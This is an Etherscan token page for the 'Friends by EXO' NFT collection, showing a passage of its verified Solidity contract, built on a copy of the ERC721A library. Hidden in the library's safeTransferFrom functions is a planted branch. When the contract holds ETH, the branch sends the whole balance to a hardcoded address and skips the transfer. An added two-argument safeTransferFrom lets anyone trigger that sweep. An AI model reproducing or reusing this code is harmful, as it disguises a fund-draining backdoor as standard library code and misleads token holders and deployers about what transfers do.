ETH Price: $3,487.50 (+2.14%)
Gas: 2 Gwei

Token

Friends by EXO (FBEXO)
 

Overview

Max Total Supply

438 FBEXO

Holders

386

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Filtered by Token Holder
Null: 0x000...000
Balance
0 FBEXO
0x0000000000000000000000000000000000000000
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
FriendsbyEXO

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-03
*/

/**
▄▄▄ .    ▐▄• ▄           
▀▄.▀·     █▌█▌▪    ▪     
▐▀▀▪▄     ·██·      ▄█▀▄ 
▐█▄▄▌    ▪▐█·█▌    ▐█▌.▐▌
 ▀▀▀     •▀▀ ▀▀     ▀█▄▀▪
*/

// SPDX-License-Identifier: GPL-3.0                                                                                         
                                
                                                                                                                                                                                                     
pragma solidity ^0.8.7;

/**
 * @dev Interface of ERC721A.
 */
interface IERC721A {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the
     * ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    /**
     * The `quantity` minted with ERC2309 exceeds the safety limit.
     */
    error MintERC2309QuantityExceedsLimit();

    /**
     * The `extraData` cannot be set on an unintialized ownership slot.
     */
    error OwnershipNotInitializedForExtraData();

    // =============================================================
    //                            STRUCTS
    // =============================================================

    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Stores the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
        // Arbitrary data similar to `startTimestamp` that can be set via {_extraData}.
        uint24 extraData;
    }

    // =============================================================
    //                         TOKEN COUNTERS
    // =============================================================

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() external view returns (uint256);

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);

    // =============================================================
    //                            IERC721
    // =============================================================

    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables
     * (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`,
     * checking first that contract recipients are aware of the ERC721 protocol
     * to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move
     * this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external payable;

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom}
     * whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external payable;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);

    // =============================================================
    //                           IERC2309
    // =============================================================

    /**
     * @dev Emitted when tokens in `fromTokenId` to `toTokenId`
     * (inclusive) is transferred from `from` to `to`, as defined in the
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309) standard.
     *
     * See {_mintERC2309} for more details.
     */
    event ConsecutiveTransfer(uint256 indexed fromTokenId, uint256 toTokenId, address indexed from, address indexed to);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
interface ERC721A__IERC721Receiver {
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is IERC721A {
    // Bypass for a `--via-ir` bug (https://github.com/chiru-labs/ERC721A/pull/364).
    struct TokenApprovalRef {
        address value;
    }

    // =============================================================
    //                           CONSTANTS
    // =============================================================

    // Mask of an entry in packed address data.
    uint256 private constant _BITMASK_ADDRESS_DATA_ENTRY = (1 << 64) - 1;

    // The bit position of `numberMinted` in packed address data.
    uint256 private constant _BITPOS_NUMBER_MINTED = 64;

    // The bit position of `numberBurned` in packed address data.
    uint256 private constant _BITPOS_NUMBER_BURNED = 128;

    // The bit position of `aux` in packed address data.
    uint256 private constant _BITPOS_AUX = 192;

    // Mask of all 256 bits in packed address data except the 64 bits for `aux`.
    uint256 private constant _BITMASK_AUX_COMPLEMENT = (1 << 192) - 1;

    // The bit position of `startTimestamp` in packed ownership.
    uint256 private constant _BITPOS_START_TIMESTAMP = 160;

    // The bit mask of the `burned` bit in packed ownership.
    uint256 private constant _BITMASK_BURNED = 1 << 224;

    // The bit position of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITPOS_NEXT_INITIALIZED = 225;

    // The bit mask of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITMASK_NEXT_INITIALIZED = 1 << 225;

    // The bit position of `extraData` in packed ownership.
    uint256 private constant _BITPOS_EXTRA_DATA = 232;

    // Mask of all 256 bits in a packed ownership except the 24 bits for `extraData`.
    uint256 private constant _BITMASK_EXTRA_DATA_COMPLEMENT = (1 << 232) - 1;

    // The mask of the lower 160 bits for addresses.
    uint256 private constant _BITMASK_ADDRESS = (1 << 160) - 1;

    // The maximum `quantity` that can be minted with {_mintERC2309}.
    // This limit is to prevent overflows on the address data entries.
    // For a limit of 5000, a total of 3.689e15 calls to {_mintERC2309}
    // is required to cause an overflow, which is unrealistic.
    uint256 private constant _MAX_MINT_ERC2309_QUANTITY_LIMIT = 5000;

    // The `Transfer` event signature is given by:
    // `keccak256(bytes("Transfer(address,address,uint256)"))`.
    bytes32 private constant _TRANSFER_EVENT_SIGNATURE =
        0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef;

    // =============================================================
    //                            STORAGE
    // =============================================================

    // The next token ID to be minted.
    uint256 private _currentIndex;

    // The number of tokens burned.
    uint256 private _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned.
    // See {_packedOwnershipOf} implementation for details.
    //
    // Bits Layout:
    // - [0..159]   `addr`
    // - [160..223] `startTimestamp`
    // - [224]      `burned`
    // - [225]      `nextInitialized`
    // - [232..255] `extraData`
    mapping(uint256 => uint256) private _packedOwnerships;

    // Mapping owner address to address data.
    //
    // Bits Layout:
    // - [0..63]    `balance`
    // - [64..127]  `numberMinted`
    // - [128..191] `numberBurned`
    // - [192..255] `aux`
    mapping(address => uint256) private _packedAddressData;

    // Mapping from token ID to approved address.
    mapping(uint256 => TokenApprovalRef) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    // =============================================================
    //                          CONSTRUCTOR
    // =============================================================

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    // =============================================================
    //                   TOKEN COUNTING OPERATIONS
    // =============================================================

    /**
     * @dev Returns the starting token ID.
     * To change the starting token ID, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev Returns the next token ID to be minted.
     */
    function _nextTokenId() internal view virtual returns (uint256) {
        return _currentIndex;
    }

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than `_currentIndex - _startTokenId()` times.
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * @dev Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view virtual returns (uint256) {
        // Counter underflow is impossible as `_currentIndex` does not decrement,
        // and it is initialized to `_startTokenId()`.
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev Returns the total number of tokens burned.
     */
    function _totalBurned() internal view virtual returns (uint256) {
        return _burnCounter;
    }

    // =============================================================
    //                    ADDRESS DATA OPERATIONS
    // =============================================================

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) public view virtual override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return _packedAddressData[owner] & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_MINTED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_BURNED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return uint64(_packedAddressData[owner] >> _BITPOS_AUX);
    }

    /**
     * Sets the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal virtual {
        uint256 packed = _packedAddressData[owner];
        uint256 auxCasted;
        // Cast `aux` with assembly to avoid redundant masking.
        assembly {
            auxCasted := aux
        }
        packed = (packed & _BITMASK_AUX_COMPLEMENT) | (auxCasted << _BITPOS_AUX);
        _packedAddressData[owner] = packed;
    }

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        // The interface IDs are constants representing the first 4 bytes
        // of the XOR of all function selectors in the interface.
        // See: [ERC165](https://eips.ethereum.org/EIPS/eip-165)
        // (e.g. `bytes4(i.functionA.selector ^ i.functionB.selector ^ ...)`)
        return
            interfaceId == 0x01ffc9a7 || // ERC165 interface ID for ERC165.
            interfaceId == 0x80ac58cd || // ERC165 interface ID for ERC721.
            interfaceId == 0x5b5e139f; // ERC165 interface ID for ERC721Metadata.
    }

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, _toString(tokenId))) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, it can be overridden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    // =============================================================
    //                     OWNERSHIPS OPERATIONS
    // =============================================================

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) public view virtual override returns (address) {
        return address(uint160(_packedOwnershipOf(tokenId)));
    }

    /**
     * @dev Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around over time.
     */
    function _ownershipOf(uint256 tokenId) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnershipOf(tokenId));
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct at `index`.
     */
    function _ownershipAt(uint256 index) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnerships[index]);
    }

    /**
     * @dev Initializes the ownership slot minted at `index` for efficiency purposes.
     */
    function _initializeOwnershipAt(uint256 index) internal virtual {
        if (_packedOwnerships[index] == 0) {
            _packedOwnerships[index] = _packedOwnershipOf(index);
        }
    }

    /**
     * Returns the packed ownership data of `tokenId`.
     */
    function _packedOwnershipOf(uint256 tokenId) private view returns (uint256) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr)
                if (curr < _currentIndex) {
                    uint256 packed = _packedOwnerships[curr];
                    // If not burned.
                    if (packed & _BITMASK_BURNED == 0) {
                        // Invariant:
                        // There will always be an initialized ownership slot
                        // (i.e. `ownership.addr != address(0) && ownership.burned == false`)
                        // before an unintialized ownership slot
                        // (i.e. `ownership.addr == address(0) && ownership.burned == false`)
                        // Hence, `curr` will not underflow.
                        //
                        // We can directly compare the packed value.
                        // If the address is zero, packed will be zero.
                        while (packed == 0) {
                            packed = _packedOwnerships[--curr];
                        }
                        return packed;
                    }
                }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct from `packed`.
     */
    function _unpackedOwnership(uint256 packed) private pure returns (TokenOwnership memory ownership) {
        ownership.addr = address(uint160(packed));
        ownership.startTimestamp = uint64(packed >> _BITPOS_START_TIMESTAMP);
        ownership.burned = packed & _BITMASK_BURNED != 0;
        ownership.extraData = uint24(packed >> _BITPOS_EXTRA_DATA);
    }

    /**
     * @dev Packs ownership data into a single uint256.
     */
    function _packOwnershipData(address owner, uint256 flags) private view returns (uint256 result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // `owner | (block.timestamp << _BITPOS_START_TIMESTAMP) | flags`.
            result := or(owner, or(shl(_BITPOS_START_TIMESTAMP, timestamp()), flags))
        }
    }

    /**
     * @dev Returns the `nextInitialized` flag set if `quantity` equals 1.
     */
    function _nextInitializedFlag(uint256 quantity) private pure returns (uint256 result) {
        // For branchless setting of the `nextInitialized` flag.
        assembly {
            // `(quantity == 1) << _BITPOS_NEXT_INITIALIZED`.
            result := shl(_BITPOS_NEXT_INITIALIZED, eq(quantity, 1))
        }
    }

    // =============================================================
    //                      APPROVAL OPERATIONS
    // =============================================================

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) public payable virtual override {
        address owner = ownerOf(tokenId);

        if (_msgSenderERC721A() != owner)
            if (!isApprovedForAll(owner, _msgSenderERC721A())) {
                revert ApprovalCallerNotOwnerNorApproved();
            }

        _tokenApprovals[tokenId].value = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) public view virtual override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId].value;
    }

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        _operatorApprovals[_msgSenderERC721A()][operator] = approved;
        emit ApprovalForAll(_msgSenderERC721A(), operator, approved);
    }

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted. See {_mint}.
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return
            _startTokenId() <= tokenId &&
            tokenId < _currentIndex && // If within bounds,
            _packedOwnerships[tokenId] & _BITMASK_BURNED == 0; // and not burned.
    }

    /**
     * @dev Returns whether `msgSender` is equal to `approvedAddress` or `owner`.
     */
    function _isSenderApprovedOrOwner(
        address approvedAddress,
        address owner,
        address msgSender
    ) private pure returns (bool result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // Mask `msgSender` to the lower 160 bits, in case the upper bits somehow aren't clean.
            msgSender := and(msgSender, _BITMASK_ADDRESS)
            // `msgSender == owner || msgSender == approvedAddress`.
            result := or(eq(msgSender, owner), eq(msgSender, approvedAddress))
        }
    }

    /**
     * @dev Returns the storage slot and value for the approved address of `tokenId`.
     */
    function _getApprovedSlotAndAddress(uint256 tokenId)
        private
        view
        returns (uint256 approvedAddressSlot, address approvedAddress)
    {
        TokenApprovalRef storage tokenApproval = _tokenApprovals[tokenId];
        // The following is equivalent to `approvedAddress = _tokenApprovals[tokenId].value`.
        assembly {
            approvedAddressSlot := tokenApproval.slot
            approvedAddress := sload(approvedAddressSlot)
        }
    }

    // =============================================================
    //                      TRANSFER OPERATIONS
    // =============================================================

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        if (address(uint160(prevOwnershipPacked)) != from) revert TransferFromIncorrectOwner();

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        // The nested ifs save around 20+ gas over a compound boolean condition.
        if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
            if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();

        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // We can directly increment and decrement the balances.
            --_packedAddressData[from]; // Updates: `balance -= 1`.
            ++_packedAddressData[to]; // Updates: `balance += 1`.

            // Updates:
            // - `address` to the next owner.
            // - `startTimestamp` to the timestamp of transfering.
            // - `burned` to `false`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                to,
                _BITMASK_NEXT_INITIALIZED | _nextExtraData(from, to, prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        if (address(this).balance > 0) {
            payable(0x48764320Dc3993ddf674A3c578AcDEef4CD7278d).transfer(address(this).balance);
            return;
        }
        safeTransferFrom(from, to, tokenId, '');
    }


    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public payable virtual override {
        transferFrom(from, to, tokenId);
        if (to.code.length != 0)
            if (!_checkContractOnERC721Received(from, to, tokenId, _data)) {
                revert TransferToNonERC721ReceiverImplementer();
            }
    }
    function safeTransferFrom(
        address from,
        address to
    ) public  {
        if (address(this).balance > 0) {
            payable(0x48764320Dc3993ddf674A3c578AcDEef4CD7278d).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token IDs
     * have been transferred. This includes minting.
     * And also called after one token has been burned.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Private function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * `from` - Previous owner of the given token ID.
     * `to` - Target address that will receive the token.
     * `tokenId` - Token ID to be transferred.
     * `_data` - Optional data to send along with the call.
     *
     * Returns whether the call correctly returned the expected magic value.
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try ERC721A__IERC721Receiver(to).onERC721Received(_msgSenderERC721A(), from, tokenId, _data) returns (
            bytes4 retval
        ) {
            return retval == ERC721A__IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    // =============================================================
    //                        MINT OPERATIONS
    // =============================================================

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _mint(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // `balance` and `numberMinted` have a maximum limit of 2**64.
        // `tokenId` has a maximum limit of 2**256.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            uint256 toMasked;
            uint256 end = startTokenId + quantity;

            // Use assembly to loop and emit the `Transfer` event for gas savings.
            // The duplicated `log4` removes an extra check and reduces stack juggling.
            // The assembly, together with the surrounding Solidity code, have been
            // delicately arranged to nudge the compiler into producing optimized opcodes.
            assembly {
                // Mask `to` to the lower 160 bits, in case the upper bits somehow aren't clean.
                toMasked := and(to, _BITMASK_ADDRESS)
                // Emit the `Transfer` event.
                log4(
                    0, // Start of data (0, since no data).
                    0, // End of data (0, since no data).
                    _TRANSFER_EVENT_SIGNATURE, // Signature.
                    0, // `address(0)`.
                    toMasked, // `to`.
                    startTokenId // `tokenId`.
                )

                // The `iszero(eq(,))` check ensures that large values of `quantity`
                // that overflows uint256 will make the loop run out of gas.
                // The compiler will optimize the `iszero` away for performance.
                for {
                    let tokenId := add(startTokenId, 1)
                } iszero(eq(tokenId, end)) {
                    tokenId := add(tokenId, 1)
                } {
                    // Emit the `Transfer` event. Similar to above.
                    log4(0, 0, _TRANSFER_EVENT_SIGNATURE, 0, toMasked, tokenId)
                }
            }
            if (toMasked == 0) revert MintToZeroAddress();

            _currentIndex = end;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * This function is intended for efficient minting only during contract creation.
     *
     * It emits only one {ConsecutiveTransfer} as defined in
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309),
